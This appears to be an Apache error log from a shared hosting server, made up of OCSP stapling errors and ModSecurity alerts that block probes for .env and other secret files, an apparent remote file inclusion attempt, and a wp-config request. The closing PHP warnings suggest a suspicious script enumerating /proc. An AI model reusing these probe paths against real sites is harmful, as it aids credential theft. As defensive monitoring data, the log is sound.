[Mon May 11 21:31:59.589531 2026] [ssl:error] [pid 1534836:tid 1534882] (EAI 2)Name or service not known: [client 114.119.129.24:45057] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:31:59.589769 2026] [ssl:error] [pid 1534836:tid 1534882] AH01941: stapling_renew_response: responder error
[Mon May 11 21:32:00.571197 2026] [ssl:error] [pid 1516058:tid 1516109] (EAI 2)Name or service not known: [client 114.119.129.24:45059] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:32:00.571321 2026] [ssl:error] [pid 1516058:tid 1516109] AH01941: stapling_renew_response: responder error
[Mon May 11 21:32:16.714895 2026] [security2:error] [pid 1534836:tid 1534891] [client 43.157.20.63:42692] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIuwNeaRXe5lR8y0ZOgaAAAAVQ"]
[Mon May 11 21:32:29.977339 2026] [security2:error] [pid 1588898:tid 1588914] [client 18.232.36.1:57078] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://139.59.221.205 found within ARGS:url: http://139.59.221.205/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIuzaFW67LJTsgN3jT4UwAAAA8"]
[Mon May 11 21:32:29.977828 2026] [security2:error] [pid 1588898:tid 1588914] [client 18.232.36.1:57078] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIuzaFW67LJTsgN3jT4UwAAAA8"]
[Mon May 11 21:32:29.978102 2026] [security2:error] [pid 1588898:tid 1588914] [client 18.232.36.1:57078] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIuzaFW67LJTsgN3jT4UwAAAA8"]
[Mon May 11 21:32:39.694564 2026] [security2:error] [pid 1511173:tid 1511185] [client 43.131.243.61:50218] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-savoir/"] [unique_id "agIu1_jVc-A-CSptvm2AjAAAAEk"]
[Mon May 11 21:33:17.123958 2026] [ssl:error] [pid 1511173:tid 1511194] (EAI 2)Name or service not known: [client 142.248.80.222:11212] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:17.124102 2026] [ssl:error] [pid 1511173:tid 1511194] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.544533 2026] [ssl:error] [pid 1511173:tid 1511196] (EAI 2)Name or service not known: [client 142.248.80.222:11218] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:18.544570 2026] [ssl:error] [pid 1511173:tid 1511196] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.659696 2026] [ssl:error] [pid 1534836:tid 1534886] (EAI 2)Name or service not known: [client 142.248.80.222:11234] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:18.659738 2026] [ssl:error] [pid 1534836:tid 1534886] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.679200 2026] [ssl:error] [pid 1511173:tid 1511182] (EAI 2)Name or service not known: [client 142.248.80.222:11284] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:18.679228 2026] [ssl:error] [pid 1511173:tid 1511182] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.680313 2026] [ssl:error] [pid 1588898:tid 1588902] (EAI 2)Name or service not known: [client 142.248.80.222:11320] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:18.680567 2026] [ssl:error] [pid 1588898:tid 1588902] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.680769 2026] [ssl:error] [pid 1516058:tid 1516113] (EAI 2)Name or service not known: [client 142.248.80.222:11306] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:18.680789 2026] [ssl:error] [pid 1516058:tid 1516113] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.680916 2026] [ssl:error] [pid 1534836:tid 1534888] (EAI 2)Name or service not known: [client 142.248.80.222:11280] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:18.680932 2026] [ssl:error] [pid 1534836:tid 1534888] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.681032 2026] [ssl:error] [pid 1588898:tid 1588920] (EAI 2)Name or service not known: [client 142.248.80.222:11294] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:18.681045 2026] [ssl:error] [pid 1588898:tid 1588920] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.681203 2026] [ssl:error] [pid 1511173:tid 1511192] (EAI 2)Name or service not known: [client 142.248.80.222:11260] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:18.681219 2026] [ssl:error] [pid 1511173:tid 1511192] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.681329 2026] [ssl:error] [pid 1516058:tid 1516102] (EAI 2)Name or service not known: [client 142.248.80.222:11326] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:18.681344 2026] [ssl:error] [pid 1516058:tid 1516102] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.681606 2026] [ssl:error] [pid 1534836:tid 1534894] (EAI 2)Name or service not known: [client 142.248.80.222:11248] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:18.681622 2026] [ssl:error] [pid 1534836:tid 1534894] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.699218 2026] [ssl:error] [pid 1588898:tid 1588900] (EAI 2)Name or service not known: [client 142.248.80.222:11264] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:33:18.699245 2026] [ssl:error] [pid 1588898:tid 1588900] AH01941: stapling_renew_response: responder error
[Mon May 11 21:33:18.962067 2026] [security2:error] [pid 1534836:tid 1534886] [client 142.248.80.222:11234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "happy-baby-box.fr"] [uri "/.env"] [unique_id "agIu_teaRXe5lR8y0ZOg_wAAAU8"]
[Mon May 11 21:33:18.962321 2026] [security2:error] [pid 1534836:tid 1534886] [client 142.248.80.222:11234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "happy-baby-box.fr"] [uri "/.env"] [unique_id "agIu_teaRXe5lR8y0ZOg_wAAAU8"]
[Mon May 11 21:33:18.963245 2026] [security2:error] [pid 1534836:tid 1534886] [client 142.248.80.222:11234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIu_teaRXe5lR8y0ZOg_wAAAU8"]
[Mon May 11 21:33:18.972121 2026] [security2:error] [pid 1511173:tid 1511192] [client 142.248.80.222:11260] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "happy-baby-box.fr"] [uri "/.env.production"] [unique_id "agIu_vjVc-A-CSptvm2A0gAAAFA"]
[Mon May 11 21:33:18.972355 2026] [security2:error] [pid 1511173:tid 1511192] [client 142.248.80.222:11260] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "happy-baby-box.fr"] [uri "/.env.production"] [unique_id "agIu_vjVc-A-CSptvm2A0gAAAFA"]
[Mon May 11 21:33:18.972425 2026] [security2:error] [pid 1534836:tid 1534888] [client 142.248.80.222:11280] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "happy-baby-box.fr"] [uri "/app/.env"] [unique_id "agIu_teaRXe5lR8y0ZOhAAAAAVE"]
[Mon May 11 21:33:18.972428 2026] [security2:error] [pid 1511173:tid 1511182] [client 142.248.80.222:11284] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "happy-baby-box.fr"] [uri "/api/.env"] [unique_id "agIu_vjVc-A-CSptvm2A0wAAAEY"]
[Mon May 11 21:33:18.972576 2026] [security2:error] [pid 1534836:tid 1534888] [client 142.248.80.222:11280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "happy-baby-box.fr"] [uri "/app/.env"] [unique_id "agIu_teaRXe5lR8y0ZOhAAAAAVE"]
[Mon May 11 21:33:18.972585 2026] [security2:error] [pid 1511173:tid 1511182] [client 142.248.80.222:11284] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "happy-baby-box.fr"] [uri "/api/.env"] [unique_id "agIu_vjVc-A-CSptvm2A0wAAAEY"]
[Mon May 11 21:33:18.972776 2026] [security2:error] [pid 1511173:tid 1511192] [client 142.248.80.222:11260] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIu_vjVc-A-CSptvm2A0gAAAFA"]
[Mon May 11 21:33:18.973350 2026] [security2:error] [pid 1511173:tid 1511182] [client 142.248.80.222:11284] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIu_vjVc-A-CSptvm2A0wAAAEY"]
[Mon May 11 21:33:18.973647 2026] [security2:error] [pid 1588898:tid 1588920] [client 142.248.80.222:11294] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "happy-baby-box.fr"] [uri "/backend/.env"] [unique_id "agIu_qFW67LJTsgN3jT41QAAABY"]
[Mon May 11 21:33:18.973830 2026] [security2:error] [pid 1588898:tid 1588920] [client 142.248.80.222:11294] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "happy-baby-box.fr"] [uri "/backend/.env"] [unique_id "agIu_qFW67LJTsgN3jT41QAAABY"]
[Mon May 11 21:33:18.973964 2026] [security2:error] [pid 1534836:tid 1534888] [client 142.248.80.222:11280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIu_teaRXe5lR8y0ZOhAAAAAVE"]
[Mon May 11 21:33:18.974079 2026] [security2:error] [pid 1534836:tid 1534894] [client 142.248.80.222:11248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "happy-baby-box.fr"] [uri "/.env.local"] [unique_id "agIu_teaRXe5lR8y0ZOhAQAAAVc"]
[Mon May 11 21:33:18.974164 2026] [security2:error] [pid 1588898:tid 1588920] [client 142.248.80.222:11294] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIu_qFW67LJTsgN3jT41QAAABY"]
[Mon May 11 21:33:18.974268 2026] [security2:error] [pid 1534836:tid 1534894] [client 142.248.80.222:11248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "happy-baby-box.fr"] [uri "/.env.local"] [unique_id "agIu_teaRXe5lR8y0ZOhAQAAAVc"]
[Mon May 11 21:33:18.974482 2026] [security2:error] [pid 1534836:tid 1534894] [client 142.248.80.222:11248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIu_teaRXe5lR8y0ZOhAQAAAVc"]
[Mon May 11 21:33:29.860807 2026] [security2:error] [pid 1511173:tid 1511184] [client 43.133.220.37:39664] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.habilis.space"] [uri "/"] [unique_id "agIvCfjVc-A-CSptvm2A7wAAAEg"]
[Mon May 11 21:33:36.508533 2026] [security2:error] [pid 1534836:tid 1534873] [client 43.133.220.37:59172] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.habilis.space"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agIvENeaRXe5lR8y0ZOhJAAAAUI"], referer: http://www.habilis.space
[Mon May 11 21:33:38.935792 2026] [security2:error] [pid 1534836:tid 1534891] [client 170.106.192.3:37800] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/captation.html"] [unique_id "agIvEteaRXe5lR8y0ZOhJwAAAVQ"]
[Mon May 11 21:34:09.522207 2026] [security2:error] [pid 1511173:tid 1511200] [client 43.130.72.40:35220] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "ixinabourgoin.fr"] [uri "/"] [unique_id "agIvMfjVc-A-CSptvm2BLQAAAFg"]
[Mon May 11 21:35:02.324712 2026] [security2:error] [pid 1516058:tid 1516107] [client 43.160.219.206:42678] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIvZiMeXtzav-mi9SzAiwAAANE"]
[Mon May 11 21:35:25.029780 2026] [security2:error] [pid 1588898:tid 1588905] [client 129.226.152.67:42068] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/author/mael_admin_bailly/"] [unique_id "agIvfaFW67LJTsgN3jT5lAAAAAY"]
[Mon May 11 21:35:28.393516 2026] [authz_core:error] [pid 1534836:tid 1534873] [client 4.193.137.131:14296] AH01630: client denied by server configuration: proxy:http://127.0.0.1:2082/wp-config-sample.php
[Mon May 11 21:35:34.319213 2026] [security2:error] [pid 1588898:tid 1588922] [client 129.226.152.67:47808] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agIvhqFW67LJTsgN3jT5qAAAABg"], referer: https://www.maelbailly.fr/author/mael_admin_bailly/
PHP Warning:  filesize(): stat failed for /proc/562/task/562/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/562/task/562/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/562/task/562/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/562/task/562/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/562/task/562/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/562/task/562/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/222/task/222/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/222/task/222/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/222/task/222/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/222/task/222/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/222/task/222/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/222/task/222/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
